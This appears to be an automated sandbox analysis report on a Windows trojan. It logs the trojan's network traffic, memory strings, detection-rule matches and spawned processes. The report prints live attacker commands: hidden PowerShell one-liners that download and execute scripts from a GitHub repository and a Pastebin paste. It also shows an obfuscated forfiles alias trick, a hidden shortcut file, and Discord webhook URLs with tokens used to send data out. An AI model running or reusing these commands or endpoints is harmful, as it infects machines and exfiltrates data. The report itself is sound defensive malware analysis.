Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 217Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 13:54:30 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729000471x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Fv34Bm0hZ7hp6mBEyYE%2FiN25d%2BPcp9UNScYkru13Bj7kXmAJuQezDRWwHiwynJLOYJb3LvUa12F0Xpn9FGaOB3oF0dsXL1QktYE2vklRgfn4XFknCGnjyNB9Dc1n"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=28b32a450ff2bac380e830d167c0604ce7a5a202-1729000470; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=lQe0Iw2OKxzgySPaR37b46io8PxLRVd4alq_N7AH9uM-1729000470457-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d304d2bba08a916-DFW
Source: powershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mw
Source: powershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712D7A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A36A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A34E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubuserconte
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420920F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A3E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000010.00000002.2859298831.000001D60A3E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.2573186277.0000024208F5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypte
Source: powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000C.00000002.2820044032.000001C72A609000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.c4
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discor
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.discord.com/
Source: powershell.exe, 00000004.00000002.2573186277.0000024207C11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712333000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71235C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60994C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609939000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2573186277.0000024209A4A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7138EA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/
Source: powershell.exe, 0000000C.00000002.2784074879.000001C7137B5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712E93000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 00000010.00000002.2859298831.000001D60A4C4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60AD9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4C0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A484000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2922437661.000001D621E30000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A4B6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A389000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kN
Source: powershell.exe, 00000004.00000002.2573186277.0000024207E34000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000004.00000002.2573186277.0000024208BEC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C71280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D609DF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000004.00000002.2596705455.0000024217DC0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2596705455.0000024217C7D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A35A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000C.00000002.2784074879.000001C712D5F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712D6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A35A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A34E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2784074879.000001C712E2C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2859298831.000001D60A418000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000004.00000002.2573186277.0000024209236000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.00000242092A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.000002420923F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207FC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/DriverDiag.dll
Source: powershell.exe, 00000010.00000002.2859298831.000001D60A36A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 00000004.00000002.2573186277.00000242091F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2573186277.0000024207F97000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypt
Source: unknownNetwork traffic detected: HTTP traffic on port 55614 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55617
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55624
Source: unknownNetwork traffic detected: HTTP traffic on port 55611 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55614
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55625
Source: unknownNetwork traffic detected: HTTP traffic on port 55617 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55620
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55611
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 55622
Source: unknownNetwork traffic detected: HTTP traffic on port 55620 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55622 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55624 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 55625 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:49712 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55611 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55614 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55617 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.12:55620 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.12:55622 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55624 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.138.232:443 -> 192.168.2.12:55625 version: TLS 1.2

System Summary

barindex
Source: amsi64_6988.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_2132.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C515300_2_00007FF674C51530
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C57C000_2_00007FF674C57C00
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C534300_2_00007FF674C53430
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C58C300_2_00007FF674C58C30
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C533200_2_00007FF674C53320
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C53AC00_2_00007FF674C53AC0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C55BF00_2_00007FF674C55BF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C52EF00_2_00007FF674C52EF0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C510E00_2_00007FF674C510E0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C562B00_2_00007FF674C562B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C579B00_2_00007FF674C579B0
Source: C:\Users\user\Desktop\OSLdZanXNc.exeCode function: 0_2_00007FF674C58B600_2_00007FF674C58B60
Source: amsi64_6988.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_2132.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6988, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2132, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal84.troj.evad.winEXE@21/16@3/3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6828:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7064:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qasgochu.l5o.ps1Jump to behavior
Source: OSLdZanXNc.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\OSLdZanXNc.exe "C:\Users\user\Desktop\OSLdZanXNc.exe"
Source: C:\Users\user\Desktop\OSLdZanXNc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\OSLdZanXNc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\OSLdZanXNc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -command start powershell -windowstyle h -args {iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing)}Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" iex(iwr raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/refs/heads/main/cr_asm_crypter.txt -usebasicparsing) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\OSLdZanXNc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeSection loaded: vcruntime140.dllJump to behavior
Source: C:\Users\user\Desktop\OSLdZanXNc.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
